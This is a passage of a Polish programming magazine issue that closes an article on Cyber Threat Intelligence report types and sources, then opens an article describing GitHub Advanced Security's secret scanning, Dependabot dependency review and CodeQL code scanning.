zacja jest w stanie zweryfikować aktualny stan zagrożenia na podsta-
wie własnych obserwacji, uwzględniając ogólnoświatowe trendy.
Operacyjny
Raporty operacyjne mają za zadanie dostarczyć informacji o specy-
ficznym zagrożeniu do organizacji, czyli np. o atakach i kampaniach,
które aktualnie mają miejsce. Nie chodzi tu tylko i wyłącznie o te za-
grożenia bezpośrednio wymierzone w daną organizację w aktualnym
przedziale czasowym, ale również o ataki i kampanie, które mają
miejsce na świecie i dotykają inne podmioty z tej samej branży.
Jednocześnie powinny znaleźć się tutaj informacje na temat zaso-
bów organizacji, które mogą być zagrożone, np. usługi WWW czy też
łańcuch dostaw określonego produktu.
W ramach raportu zawierane są również informacje na temat
grup (ang. threat actors), które mogą zagrażać organizacji. Ich tech-
niczne możliwości, intencje oraz stopień prawdopodobieństwa, że to
akurat one mogą być zainteresowane przeprowadzeniem ataku na
organizację.
Źródłem informacji są między innymi media społecznościowe,
zamknięte fora grup przestępczych oraz dane od innych instytucji,
które śledzą zagrożenia w cyberprzestrzeni.
Tak jak w przypadku raportu strategicznego, operacyjny rów-
nież utrzymywany jest w tonie informacji wysoko poziomowych.
Informacje w nim zawarte są przydatne tylko w krótkim przedziale
czasowym.
Przeznaczony jest dla managerów zespołów defensywnych, tzw.
blue teamów.
Taktyczny
Raport taktyczny w porównaniu do poprzednich przechodzi do
szczegółów identyfikowanych zagrożeń. Mówiąc o szczegółach, mam
na myśli taktyki, techniki i procedury (ang. tactics, techniques and
procedures – TTPs), którymi posługują się agresorzy.
O TTPs wspominałem już wcześniej, przy okazji piramidy bólu.
Dzięki zawarciu w raporcie wspomnianych TTPs odbiorcy są
w stanie zrozumieć, w jaki sposób infrastruktura organizacji może
być atakowana i jak należałoby się przed tego typu zagrożeniami bro-
nić oraz je identyfikować.
Źródłem danych dla raportu są między innymi analizy złośliwego
oprogramowania, raporty z incydentów, raporty CTI dostarczane od
vendorów oraz opracowania opisujące agresorów, a także wiele in-
nych, jak np. OSINT.
Informacje przedstawiane w raporcie stanowią czysto techniczny
opis zagrożenia, a tym samym są idealnie rozumiane przez eksper-
< 101 > }
 / Cyber Threat Intelligence – czym jest i dlaczego jest ważne /
tów bezpieczeństwa, takich jak managerów SOC (Security Operation
Center) oraz NOC (Network Operation Center). Dodatkowo mogą
być wykorzystywane w dłuższym przedziale czasu.
Techniczny
Raport tego typu skupia się na dostarczeniu informacji na temat
zasobów technicznych agresorów, takich jak konkretne adresy
IP wykorzystywane w kampaniach czy też należące do serwerów
C2 (Command and Control). Ale także narzędzi, struktury ma-
ili phishingowych, adresów URL czy też samego oprogramowania
złośliwego.
Informacje zawarte w raporcie pozwalają na identyfikację aktu-
alnie aktywnego ataku poprzez właśnie dostarczenie tak zwanych
wskaźników kompromitacji (IoC – Indicator of Compromise).
Tym samym raport ten dostarcza nisko poziomowych informacji,
którymi organizacja może posłużyć się w celu zasilenia swoich syste-
mów bezpieczeństwa (IDS/IPS, firewalle, EDR i inne), aby zwiększyć
szansę na wykrycie kampani, która ma miejsce. Ale również jako in-
formacja dla zespołów reagowania na incydenty (CERT/CSIRT), aby
mogły np. zaklasyfikować istniejący incydent do konkretnej kampani.
Z uwagi na to informacje zawarte w raporcie mają krótki czas
przydatności, ponieważ wskaźniki kompromitacji to ten typ infor-
macji, które zmieniają się bardzo szybko oraz są łatwe do zidentyfi-
kowania według przytoczonej wcześniej piramidy bólu.
Przedstawione rodzaje w określonej kolejności doskonale obrazu-
ją przejście od ogółu do szczegółu informacji wywiadowczych.
{ WWW.PROGRAMISTAMAG.PL }
JAK MOŻNA WYKORZYSTAĆ CTI
Gdy już mamy świadomość, jak przebiega cykl życia CTI oraz jakie-
go rodzaju informacji wywiadowczych w formie raportów można
oczekiwać od operacji CTI, warto wyjaśnić, jak rzeczywiście organi-
zacja może wykorzystać CTI.
Aby skutecznie bronić się przed zagrożeniami, należy uwzględnić
4 zdolności zespołów bezpieczeństwa: przewidywanie (ang. predict),
zapobieganie (ang. prevent), detekcję (ang. detection) oraz reakcję
(ang. respond).
Każda z tych zdolności w inny sposób będzie korzystać z infor-
macji wywiadowczych dostarczanych przez zespół CTI.
Przewidywanie
Strategiczne raporty CTI pozwalają organizacji na prognozowanie
trendów zagrożeń zanim się one zmaterializują i spowodują szkody.
A tym samym pozwalają na planowanie strategii obrony w celu ich
uniknięcia.
Zapobieganie
CTI pomaga w zatrzymaniu zagrożenia już w pierwszej fazie jego wystą-
pienia poprzez przerwanie łańcucha zagrożeń (Cyber Kill Chain5), np.
poprzez dostarczenie zespołowi bezpieczeństwa hashy próbek złośliwe-
go oprogramowania czy też nagłówków wiadomości phishingowych.
5. lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html
/* REKLAMA */
<49>
BEZPIECZEŃSTWO
Detekcja
W przypadku wystąpienia zagrożenia już bezpośrednio w infrastruk-
turze organizacji informacje wywiadowcze dostarczone przez CTI
pomagają w identyfikacji tego, co już ma miejsce. Informacje te
wzbogacają działania zespołu Threat Huntingu, który jest odpowie-
dzialny za identyfikację tego typu zagrożenia.
Reakcja
Informacje dostarczone przez CTI pomagają w reakcji na istniejący
incydent oraz ograniczenie potencjalnych skutków jego wystąpienia.
Wspiera również proces przewidywania kolejnych kroków, które
mogą być podjęte przez agresora, a tym samym do planowania dzia-
łań obronnych.
SKĄD CZERPAĆ INFORMACJE
Odpowiednie źródła danych oraz informacji to połowa sukcesu po-
wodzenia całej operacji CTI. Autentyczność, wiarygodność, a zara-
zem komplementarność danych to klucz do zwycięstwa. Poleganie
wyłącznie na jednym źródle, które dostarcza np. informacji o subdo-
menach, jest niewystarczające i powinno być uzupełnione o dodat-
kowe zasoby.
Jednocześnie poleganie tylko i wyłącznie np. na jednym raporcie,
który przedstawia zidentyfikowane TTPs wykorzystywane w aktual-
nej kampani, może skutkować niewystarczającą zdolnością przewi-
dywania, zapobiegania, detekcji oraz reakcji na zagrożenie.
Dzięki temu minimalizujemy możliwość pominięcia istotnej
informacji.
Skąd w takim razie czerpać istotne dane i informacje, aby nic nie
umknęło, a tym samym były one wartościowe? Prócz innych rapor-
tów CTI, analizy złośliwego oprogramowania, pomocna jest analiza
dark i deep webu, czyli miejsca, gdzie operują agresorzy, wymienia-
jąc się informacjami na temat przeprowadzonych oraz planowanych
operacjach. Oczywiście należy mieć na uwadze, iż nie wszystkie źró-
dła tego typu będą dostępne od ręki. Duża ich ilość jest ograniczona
tylko dla zaufanych członków tych grup. Niemniej jednak jest to cen-
ne źródło informacji.
Często vendorzy CTI, którzy na co dzień dostarczają informacji
wywiadowczych, posiadają techniczne możliwości stałego monitoro-
wania tego typu źródeł.
Monitorowanie mediów społecznościowych oraz platform komu-
nikacyjnych takich jak Telegram jest doskonałym źródłem na temat
bieżących wydarzeń. Jednocześnie wsparte obserwacją wydarzeń
TOMASZ KRAWCZYK
Aktualnie członek zespołu Red Team w jednym z międzynarodowych banków. W przeszłości pentester oraz certowiec w jednej z agencji rządowych.
Entuzjasta CTI, OSINT oraz programowania.
<50> { 2 / 2022
geopolitycznych pozwala na zrozumienie intencji tak zwanych state
actors, czyli grup APT sponsorowanych przez rządy.
Wszelkiej maści repozytoria kodu (GitHub/GitLab, Bitbucket,
SourceForge i inne) czy też serwisy typu Pastebin stanowią znakomi-
te źródło nie tylko dla identyfikacji nowych TTPs wykorzystywanych
w atakach, ale również jako miejsce wycieków danych wrażliwych,
np. haseł.
Platformy wymiany informacji CTI utrzymywane przez różnych
vendorów bezpieczeństwa pozwalają na uzupełnienie posiadanych
informacji oraz ich weryfikację.
PODSUMOWANIE
Cyber Threat Intelligence to potężne narzędzie w rękach organizacji,
pozwalające w znacznym stopniu chronić ją przed istniejącymi, jak
i przyszłymi zagrożeniami.
Jednak musimy pamiętać, że jest to ciągły proces, który stale nale-
ży usprawniać, i mający różnych odbiorców, których zapotrzebowa-
nie na informacje wywiadowcze należy zaspokoić.
Będąc świadomym, w jaki sposób realizowane są operacje CTI
i jaki jest cykl życia całego procesu, pozwala to na sprawne porusza-
nie się w całym ogromie informacji oraz na czerpanie z nich samych
korzyści.
Realizacja zadań CTI niestety wymaga czasu, w ramach którego
zaangażowana powinna być odpowiednia kadra specjalistów wraz
z narzędziami, które będą ich wspomagać. Tym samym potrzebny
jest odpowiedni nakład finansowy. Stąd też nie każda organizacja jest
w stanie udźwignąć taki koszt lub też nie zawsze będzie realizować
pełny zakres operacji CTI.
W takiej sytuacji organizacja może wykorzystać odpowiedniego
vendora, który dostarcza stosownych informacji wywiadowczych
w postaci raportów odpowiedniego rodzaju (strategicznego, opera-
cyjnego, taktycznego czy też technicznego).
Do bardziej praktycznego ujęcia CTI przejdziemy w drugiej czę-
ści artykułu, w którym przybliżę procesy automatyzacji pozyskiwania
danych oraz ich analizy.
Bibliografia
[1] crest-approved.org/wp-content/uploads/CREST-Cyber-Threat-Intelligence.pdf
[2] https://www.agari.com/email-security-blog/what-is-cyber-threat-intelligence/
[3] https://counterintelligence.pl
[4] https://cryptome.org/2013/01/aaron-swartz/Psychology-of-Intelligence-Analysis.pdf
[5] https://www.youtube.com/watch?v=J7e74QLVxCk
[6] https://attack.mitre.org
[7] https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html
< 101 > }
BEZPIECZEŃSTWO
Funkcje bezpieczeństwa w GitHub Advanced Security
Dbanie o bezpieczeństwo wytwarzanego oprogramowania to złożony proces. Programista
powinien zadbać o jakość własnego kodu, aktualizację wykorzystywanych bibliotek czy wła-
ściwe zarządzanie sekretami. Jeżeli korzystamy z repozytorium kodu GitHub, a nasz kod jest
publicznie dostępny, wiele z tych czynności możemy zautomatyzować bezkosztowo. Pomogą
nam w tym mechanizmy z modułu GitHub Advanced Security (GHAS), takie jak Dependency
Review, Secret Scanning czy Code Scanning.
PROBLEM
Chociaż mogłoby się wydawać, że nowoczesne frameworki progra-
mistyczne skutecznie starają się chronić programistę przed większo-
ścią popularnych błędów bezpieczeństwa, to nie są one panaceum na
wszystkie możliwe zagrożenia. Opieranie bezpieczeństwa na samych
umiejętnościach programisty to spore ryzyko. Za dobrą praktykę
uważa się zintegrowanie w proces wytwarzania oprogramowania
mechanizmów, które w sposób automatyczny (a w miarę możliwości
w czasie rzeczywistym) wykonują szereg kontroli i analiz z obszaru
bezpieczeństwa kodu. W artykule postaramy się przybliżyć czytelni-
kowi mechanizmy bezpieczeństwa, które może zastosować do swo-
jego publicznie dostępnego repozytorium kodu mieszczącego się na
platformie GitHub. Narzędzia, które omówimy, dobrze wpasowują
się w podejście shift left security, w ramach którego należy przyło-
żyć wagę do wykrywania błędów programistycznych i podatności
na możliwie najwcześniejszym etapie tworzenia oprogramowania.
WRÓG U BRAM
Zanim jednak przyjrzymy się mechanizmom, które mają nam pomóc
w automatyzacji bezpieczeństwa kodu, warto zapoznać się z samymi
zagrożeniami, które czyhają na twórców aplikacji. Żeby wprowadzić
czytelnika w temat bezpieczeństwa aplikacji, weźmiemy pod lupę
popularne grupy zagrożeń z obszaru wytwarzania oprogramowania.
Skupimy się na tych, które przysporzyły w ostatnim czasie właścicie-
lom aplikacji największy ból głowy, a następnie zmapujemy je na me-
chanizmy dostępne w ramach GHAS, które pozwolą zidentyfikować
ich występowanie i zminimalizować ryzyko ich wykorzystania.
Przechowywanie sekretów w kodzie
Tokeny API, klucze AWS, certyfikaty – nowoczesna aplikacja potrze-
buje dostępu do tego typu danych, aby komunikować się z innymi
systemami i skutecznie realizować usługi, do których została zapro-
jektowana. Takie informacje nie powinny jednak być przechowywa-
ne bezpośrednio w repozytorium kodu. Niestety historia pokazuje, że
nie zawsze programistom udaje się zachować odpowiednią higienę
kodu w tym zakresie. Znane są przypadki, gdzie skutki umyślnego
(lub przypadkowego) przechowywania sekretów w plikach konfigu-
racyjnych (lub bezpośrednio w kodzie) były dotkliwe. Na przykład
umieszczenie tokena GitHub access w repozytorium kodu mogło
<52> { 2 / 2022
spowodować nieautoryzowany dostęp do repozytorium kodu aplika-
cji Shopify1, a pozostawienie tokena AWS access naraziło właściciela
konta na wysokie koszty2.
Dobrą praktyką jest przechowywanie poświadczeń wykorzy-
stywanych przez aplikację w zaszyfrowanej postaci, w odpowiednio
zaprojektowanych „skarbcach”. Użytkownicy GitHub mogą skorzy-
stać z mechanizmu Encrypted Secrets3, który pozwala na bezpiecz-
ne przechowywanie wrażliwych danych uwierzytelniających wyko-
rzystywanych przez GitHub Actions4. Jednakże mechanizm ten nie
chroni przed omyłkowym umieszczeniem sekretów w kodzie ani nie
monitoruje kodu pod kątem ich przypadkowego upublicznienia.
Bezpieczeństwo łańcucha dostaw
W ostatnim czasie, nie tylko w dziedzinie wytwarzania oprogramo-
wania, popularnym tematem stał się łańcuch dostaw (oraz jego bez-
pieczeństwo). Definicja łańcucha dostaw5 powiązana jest z zależno-
ściami od zewnętrznych komponentów, jakie występują w finalnym
produkcie. Brak dostępności zewnętrznego komponentu, z którego
składa się dany produkt, oznacza brak kompletności całego produk-
tu. Analogicznie występowanie podatności w komponencie, z któ-
rego zbudowany jest produkt, wpływa na końcowe bezpieczeństwo
całego produktu. Stosując tę wiedzę do procesu wytwarzania opro-
gramowania, okazuje się, że wcale nie trzeba bezpośrednio atakować
aplikacji, aby przełamać jej zabezpieczenia. Zamiast tego atakujący
może zidentyfikować podatną bibliotekę lub próbować zainfekować
komponent, który zostanie wykorzystany do zbudowania oprogra-
mowania. To właśnie dwa ataki z wykorzystaniem łańcucha dostaw
spędzały sen z powiek osobom zajmującym się bezpieczeństwem:
» Log4j Vulnerability6 – czyli podatność w komponencie do lo-
gowania, która umożliwia zdalne wykonanie kodu. Biblioteka
była pobierana ponad 10.350.000 razy (w tym używana przez
Amazon, Minecraft, Oracle, Apple i innych). Więcej o podatno-
ści Log4j można przeczytać w aktualnym wydaniu w artykule
„Z archiwum CVE: Log4j”.
1. https://portswigger.net/daily-swig/stray-github-access-token-from-shopify-earns-novice-bug-bounty-
hunter-50k
2. https://selvaganesh93.medium.com/what-happens-if-you-accidentally-commit-your-aws-access-
token-to-public-github-be50d378b4c7
3. https://docs.github.com/en/actions/security-guides/encrypted-secrets
4. https://docs.github.com/en/actions
5. https://github.blog/2020-09-02-secure-your-software-supply-chain-and-protect-against-supply-
chain-threats-github-blog/
6. hackerone.com/vulnerability-management/log4j-vulnerability-activity-hackerone-platform
< 101 > }
 / Funkcje bezpieczeństwa w GitHub Advanced Security /
» SolarWinds7 – historia wstrzyknięcia złośliwego kodu w opro-
gramowanie wykorzystywane m.in. przez największe firmy z listy
Fortune 500.
Aby uniknąć tego typu problemów, programista powinien co naj-
mniej śledzić, z jakich komponentów jest zbudowana aplikacja, oraz
systematycznie weryfikować, czy nie mają one znanych podatności
bezpieczeństwa. Jeśli taka zależność zostanie znaleziona, powinna
zostać zaktualizowana, zastąpiona lub usunięta.
Błędy w kodzie
Popełnienie błędu w kodzie podczas pisania aplikacji można przy-
jąć za rzecz nieuniknioną. Niektórzy przygodę z programowaniem
dopiero zaczynają, a inni nie są świadomi błędów, które popełniają.
Wiele z pozornie prostych pomyłek może w przyszłości przyczynić
się do powstania poważnych błędów w oprogramowaniu. Błędy pro-
gramistyczne można popełnić na każdym etapie, od frontendu do
backendu, przez kontrolę dostępu do błędów w logice biznesowej8.
Zasadniczo próby znalezienia tego typu podatności możemy wy-
konywać już od pierwszych napisanych linijek kodu, a dobrą prakty-
ką jest skanowanie repozytorium kodu po każdej jego modyfikacji.
Do tego zadania służą m.in. narzędzia klasy Static Application Secu-
rity Testing (SAST), które skutecznie znajdują np. sklejane zapytania
SQL czy użycie niebezpiecznych funkcji.
REPOZYTORIUM KODU GITHUB
GitHub to największa platforma oparta na rozproszonym systemie kon-
troli wersji. Powstała ona w 2008 roku i mało kto mógł wówczas przy-
puszczać, że 10 lat później Microsoft zapłaci za nią astronomiczną kwotę
7,5 miliarda dolarów. GitHub obsługuje obecnie ponad 128 milionów
publicznych projektów i jest często pierwszym wyborem użytkowników
społeczności open source (ponad 24 milionów kont publicznych)9.
Na popularność platformy GitHub wpływa m.in. prosty i intuicyj-
ny interfejs użytkownika (GUI), który ułatwia wprowadzenie progra-
mistów do pracy z systemem kontroli wersji, rozbudowane API oraz
GitHub Marketplace10, czyli miejsce do integracji kodu użytkowni-
ka z narzędziami i oprogramowaniem zewnętrznym. Ekosystem
GitHub dynamicznie się rozwija, a zaplanowane na rok 2022 nowe
funkcje platformy dostępne są do wglądu dla każdego użytkownika
serwisu11. Zespół rozwijający platformę nie tylko przykłada uwagę
do rozwoju narzędzi mających polepszyć ergonomię pracy w eko-
systemie GitHub (przez wprowadzanie takich narzędzi jak GitHub
CodeSpace12 czy GitHub CoPilot13) oraz integracji kodu z procesem
CI/CD (poprzez wykorzystanie GitHub Actions14), ale również dba
o bezpieczeństwo kodu znajdującego się w repozytorium poprzez
wykorzystanie mechanizmów wchodzących w skład GitHub Advan-
7. https://whatis.techtarget.com/feature/SolarWinds-hack-explained-Everything-you-need-to-know
8. https://waverleysoftware.com/blog/top-software-vulnerabilities/
9. https://towardsdatascience.com/githubs-path-to-128m-public-repositories-f6f656ab56b1
10. https://github.com/marketplace
11. https://github.com/orgs/github/projects/4247/views/1
12. https://github.com/features/codespaces
13. https://copilot.github.com/
14. https://github.com/features/actions
{ WWW.PROGRAMISTAMAG.PL }
ced Security15 (GHAS). Właśnie na korzyściach płynących z wyko-
rzystania GHAS skupimy się w tym artykule.
Rys historyczny
Obecne mechanizmy dostępne w ramach pakietu GitHub Advanced
Security to efekt wieloletniej pracy włożonej we wdrożenie w ekosys-
tem GitHub narzędzi mających podnieść bezpieczeństwo kodu:
» W 2017 roku wprowadzono mechanizm Dependency Graph16,
który umożliwiał tworzenie listy bibliotek zewnętrznych wyko-
rzystywanych w projekcie, a niespełna miesiąc później mecha-
nizm Security Alerts17, który informował administratora repo-
zytorium, jeżeli jego kod korzystał z podatnej biblioteki.
» W 2018 roku dodano mechanizm Token Scanning18 dla publicz-
nych repozytoriów (prekursor mechanizmu Secret Scanning) –
pierwotnie sprawdzał on występowanie w kodzie tokenów GitHub
OAuth, a następnie rozszerzono funkcjonalność, by weryfikować
występowanie w kodzie również i innych sekretów, jak na przy-
kład tokeny AWS, GCP czy Azure.
» W styczniu 2019 roku GitHub zintegrował narzędzie Dependabot
ze swoją platformą19, dając użytkownikom możliwość zaktualizo-
wania podatnej biblioteki zewnętrznej wykorzystywanej w kodzie
do najbliższej niepodatnej wersji w zaledwie kilka kliknięć.
» W maju 2019 zostały wprowadzone funkcje:
ǿ Security Policy20 – czyli sekcja w zakładce Security, w której
programista może umieścić plik SECURITY.MD zawie-
rający informację o tym, w jaki sposób można się z nim
kontaktować w przypadku znalezienia podatności bezpie-
czeństwa w kodzie
ǿ Security Advisory21, gdzie administrator repozytorium
może zamieszczać informacje o podatnościach zidentyfi-
kowanych w jego kodzie, wraz z rekomendacjami odnośnie
tego, która wersja kodu jest wolna od błędu.
» Koniec roku 2019 przyniósł możliwość wykorzystania mechani-
zmu GitHub Actions22 dla otwartych repozytoriów. Umożliwia
on tworzenie potoków CI/CD dla kodu znajdującego się w re-
pozytorium GitHub. To właśnie na tym mechanizmie opiera się
automatyzacja bezpieczeństwa GitHub Actions.
» W maju 2020, podczas konferencji GitHub Satellite wprowadzo-
na zostaje nazwa GitHub Advanced Security wraz z przekaza-
niem informacji o możliwości skanowaniu kodu aplikacji znaj-
dującej się w repozytorium GitHub z wykorzystaniem silnika
CodeQL, który zostanie opisany w dalszej części artykułu.
To oczywiście nie koniec zaplanowanych prac w obszarze bezpie-
czeństwa platformy GitHub. Na roadmapie zespołu GitHub można
zobaczyć dalsze planowane usprawnienia w obszarze GitHub Advan-
ced Security23.
15. docs.github.com/en/get-started/learning-about-github/about-github-advanced-security
16. https://github.blog/2017-10-11-a-more-connected-universe/
17. https://github.blog/2017-11-16-introducing-security-alerts-on-github/
18. https://github.blog/2018-10-17-behind-the-scenes-of-github-token-scanning/
19. github.blog/2019-01-31-keep-your-dependencies-secure-and-up-to-date-with-github-and-dependabot/
20. docs.github.com/en/code-security/getting-started/adding-a-security-policy-to-your-repository
21. https://docs.github.com/en/code-security/security-advisories/about-github-security-advisories
22. https://github.blog/2019-08-08-github-actions-now-supports-ci-cd/
23. https://github.com/orgs/github/projects/4247/views/6
<53>
BEZPIECZEŃSTWO
Rysunek 1. Publicznie dostępna roadmapa rozwoju narzędzi z pakietu GitHub Advanced Security
KOSZTY I OPŁATY
W tym miejscu warto się na chwilę zatrzymać i pokrótce opisać kosz-
ty związane z korzystaniem z pakietu GHAS. Dla użytkowników
platformy GitHub, których kod znajduje się w repozytoriach pu-
blicznie dostępnych, funkcje wchodzące w skład GitHub Advanced
Security są darmowe24. Użytkownik zwolniony jest z opłat zarówno
za korzystanie z mechanizmów Dependency Review, Secret Scan-
ning, jak i Code Scanning (z wykorzystaniem silnika CodeQL). Co
więcej, użytkownikowi nie naliczana jest opłata za uruchamianie za-
dań z wykorzystaniem mechanizmu GitHub Actions (dla właścicieli
prywatnych repozytoriów uruchomienie kodu w ramach mechani-
zmu GitHub Actions na serwerach GitHub wiąże się z poniesieniem
opłaty, która naliczana jest za każdą minutę działania kodu). Dlatego
darmowe konta z publicznie dostępnym kodem idealnie nadają się
do doskonalenia swoich umiejętności w obszarze DevSecOps z wy-
korzystaniem wbudowanych mechanizmów oferowanych przez plat-
formę GitHub.
Dla użytkowników kont GitHub Enterprise rozliczenie za pakiet
GitHub Advanced Security odbywa się za pomocą licencji wydawa-
nych na tzw. Commitera25 (czyli osobę aktywnie dodającą nowe li-
nie kodu do repozytorium). Warto zaznaczyć, że osobno naliczana
jest tutaj opłata za wykorzystane minuty na zadania GitHub Actions.
Na stronie GitHub można zapoznać się z cennikiem26 i bardzo po-
mocnym kalkulatorem27.
24. Stan na marzec 2022 r.
25. https://docs.github.com/en/billing/managing-billing-for-github-advanced-security/about-billing-
-for-github-advanced-security
26. https://github.com/pricing
27. https://github.com/pricing/calculator
<54>
Mechanizmy GitHub Advanced Security
Na dzisiaj w skład pakietu GitHub Advanced Security wchodzą na-
stępujące mechanizmy:
» GitHub Secret Scanning
» GitHub Dependency Review
» GitHub Code Scanning
Poświęćmy chwilę, aby zapoznać się z ich konfiguracją.
Poniżej zaprezentowano interfejs (Rysunek 2 i Rysunek 3), gdzie
użytkownik może włączyć funkcje GHAS (GitHub Advanced Security).
Poszczególne mechanizmy zostaną omówione w dalszej części artykułu.
Warto zaznaczyć, że wgląd do zakładki Security z widokiem listy podat-
ności dostępny jest jedynie dla administratora repozytorium lub użyt-
kownika z rolą Security Manager28 (dla kont GitHub Enterprise).
GitHub Secret Scanning
GitHub Secret Scanning to narzędzie, które przeszukuje repozyto-
ria kodu w poszukiwaniu znanych formatów kluczy i tokenów. Jeśli
w repozytorium kodu użytkownika platformy GitHub znajdą się klu-
cze AWS czy token do autoryzacji, GitHub powiadomi usługodawcę,
który wydał sekret. Usługodawca weryfikuje ciąg znaków, a następnie
zdecyduje, czy powinien unieważnić klucz, wydać nowy czy skontak-
tować się bezpośrednio z właścicielem repozytorium. GitHub publi-
kuje listę partnerów29, z którymi współpracuje w ramach mechani-
zmu Secret Scanning (Rysunek 4).
28. https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-
roles/managing-security-managers-in-your-organization
29. https://docs.github.com/en/code-security/secret-scanning/secret-scanning-patterns
{ 2 / 2022 < 101 > }
 / Funkcje bezpieczeństwa w GitHub Advanced Security /

Rysunek 2. Zakładka Security jest głównym miejscem z informacjami o podatnościach znalezionych w ramach GHAS. Domyślnie funkcje Code Scanning oraz Dependabot alerts są wyłączone

Rysunek 3. Funkcje z pakietu GHAS można również włączyć z poziomu zakładki Settings, sekcja Code Securtity and Analysis

Rysunek 4. Schemat komunikacji30 z właścicielem repozytorium w przypadku znalezienia przez GitHub sekretu w kodzie

30. https://docs.github.com/en/developers/overview/secret-scanning-partner-program

{ WWW.PROGRAMISTAMAG.PL } <55>
BEZPIECZEŃSTWO
Dla bezpłatnych kont założonych na platformie GitHub mających
otwarte repozytoria mechanizm Secret Scanning jest automatycznie
włączany w repozytoriach publicznych, nie ma możliwości jego kon-
figuracji i nie można go wyłączyć (Rysunek 5).
Rysunek 5. Mechanizm Secret Scanning jest domyślnie aktywny i nie można go wyłączyć
dla darmowych kont GitHub
GitHub dependency review
Dependency review31 to odpowiedź platformy GitHub na problem
związany z bezpieczeństwem łańcucha dostaw. Mechanizm ten
umożliwia wychwycenie podatnych komponentów, z których zbu-
dowana jest aplikacja, oraz dostarcza informacji o licencji i wersji
zależności.
Aby przeprowadzić przegląd zależności (ang. dependency review),
GitHub posiłkuje się następującymi mechanizmami:
» Dependency graph
» GitHub Advisory Database
» Dependabot
ǿ alerts
ǿ security updates
Zadaniem funkcji Dependency graph32 jest wgląd w pliki manifestu
oraz pliki konfiguracyjne, aby pozyskać informacje o zależnościach
wykorzystanych w projekcie. Narzędzie to można aktywować w usta-
wieniach repozytorium w zakładce Code security and analysis, a lista
zależności jest dostępna w repozytorium z poziomu zakładki Insights,
sekcja Dependency graph (Rysunek 6).
GitHub Advisory Database33 to baza danych GitHub zawierająca
listę komponentów open-source ze znanymi podatnościami.
GitHub Advisory Database pobiera informacje o podatnościach
z następujących źródeł:
» National Vulnerability Database34
» Security advisories zgłoszone na GitHub35
» Skany repozytoriów GitHub z wykorzystaniem własnych algo-
rytmów machine learning
Każdy użytkownik może dodać swój rekord do bazy, dlatego podat-
ności dzielą się dodatkowo na dwie kategorie – zatwierdzone i nieza-
twierdzone przez GitHub.
Funkcja Dependabot Alerts ma na celu wysłanie powiadomień,
kiedy zostaną wykryte podatne zależności w repozytorium. Tech-
nicznie rzecz ujmując, Dependabot sprawdza, czy komponenty,
z których korzysta aplikacja, nie są zgłoszone w GitHub Advisory
Database, a następnie wyświetli powiadomienie w zakładce Security
na platformie GitHub. Przeszukiwanie odbywa się, gdy:
31. https://docs.github.com/en/code-security/supply-chain-security/understanding-your-software-sup-
ply-chain/about-dependency-review
32. https://docs.github.com/en/enterprise-server@3.1/code-security/supply-chain-security/understan-
ding-your-software-supply-chain/about-the-dependency-graph
33. https://github.com/advisories
34. https://nvd.nist.gov/
35. https://docs.github.com/en/code-security/repository-security-advisories/about-github-security-
advisories-for-repositories
<56> { 2 / 2022
» Nowy rekord zostanie dodany do bazy podatności GitHub (Gi-
tHub Advisory Database).
» Zmienia się Dependency graph dla repozytorium.
Dependabot security updates to narzędzie, które w automatyczny spo-
sób pomaga w aktualizacji komponentów. Jeżeli w repozytorium zosta-
nie wykryta podatna zależność, Dependabot automatycznie zapropo-
nuje podniesienie jej wersji. Proces składa się z następujących kroków:
» Dependabot sprawdzi, czy jest możliwa aktualizacja zależności
do wersji, która nie zawiera podatności,
» Dependabot wykona pull request z zaktualizowaną zależnością
w najniższej wersji, która zawiera patch.
Od administratora repozytorium zależy, czy zaproponowane zmiany
zostaną zaakceptowane.
Zarówno funkcje Dependabot Alerts, jak i Dependabot security
updates nie są domyślnie aktywowane. Usługę można włączyć w za-
kładce Settings, sekcja Code Security and Analysis.
CODE SCANNING
Code Scanning to funkcja z pakietu GitHub Advanced Security, któ-
ra służy do wykonywania analizy kodu znajdującego się w repozy-
torium GitHub. Mechanizm może być wykorzystany do znalezienia,
oceny i ustalenia priorytetu naprawy zidentyfikowanych błędów bez-
pieczeństwa w kodzie.
Podobnie jak Dependency review, funkcja Code Scanning nie jest
domyślnie aktywowana na koncie GitHub dla publicznych repozy-
toriów. Usługę można włączyć m.in. przez zakładkę Security, sekcja
Overview, lub w zakładce Settings, sekcja Code Security and Analysis.
Wszelkie problemy zidentyfikowane w trakcie analizy kodu są poka-
zane na platformie GitHub w zakładce Security. W ramach funkcji
Code Scanning programista może korzystać z wielu narzędzi do ana-
lizy kodu, jednak w tym artykule skupimy się wyłącznie na skanach
z wykorzystaniem silnika CodeQL obsługiwanego przez GitHub
z wykorzystaniem GitHub Actions.
W 2019 r. GitHub kupił firmę Semmle i od tej pory wdraża moż-
liwość skanowania z wykorzystaniem CodeQL na swojej platformie.
Silnik CodeQL stosuje tak zwane podejście Variant Analysis (VA),
czyli traktowanie kodu źródłowego jako bazy danych. Takie podejście
umożliwia odpytywanie bazy stworzonej na podstawie kodu o różne
właściwości w specjalnym języku CodeQL (w tym o występowania
konkretnego rodzaju podatności). Użytkownik GitHub nie musi
martwić się tym, gdzie CodeQL przechowuje bazę danych powstałą
z naszego kodu. Nie musi również instalować żadnych dodatkowych
komponentów na swojej maszynie czy niepokoić się o skalowalność
maszyn wykorzystanych do przeprowadzania skanów. Wszystkie
operacja odbywają się na serwerach GitHub.
W chwili pisania tego artykułu silnik CodeQL wspierał następu-
jące języki: C++, C#, Go, Java, JavaScript, Python, Ruby. Konfiguracja
skanu odbywa się poprzez stworzenie pliku YAML i umieszczenie go
w folderze .github/workflows/. Domyślna nazwa pliku konfiguracyj-
< 101 > }
 / Funkcje bezpieczeństwa w GitHub Advanced Security /

Rysunek 6. Dependency graph zawiera informacje o wykorzystanych zależnościach w projekcie. Przy włączonej funkcji Dependabot Alerts zakładka prezentuje informacje o podatnościach
w wykorzystywanych komponentach (informacje o podatnościach pobierane są z GitHub Advisory Database)

Rysunek 7. Widok podatnych zależności w przykładowym projekcie GitHub z włączoną funkcją Dependabot Alerts. Jeżeli możliwe jest zaktualizowanie biblioteki do niepodatnej wersji,
Dependabot security updates poinformuje o tym, prezentując zieloną ikonką z prawej strony wiersza

Rysunek 8. Użytkownik może korzystać z funkcji Code Scanning z wykorzystaniem silnika CodeQL obsługiwanego przez GitHub lub zewnętrznego narzędzia do skanowania kodu dostępne-
go np.w GitHub Marketplace

{ WWW.PROGRAMISTAMAG.PL } <57>
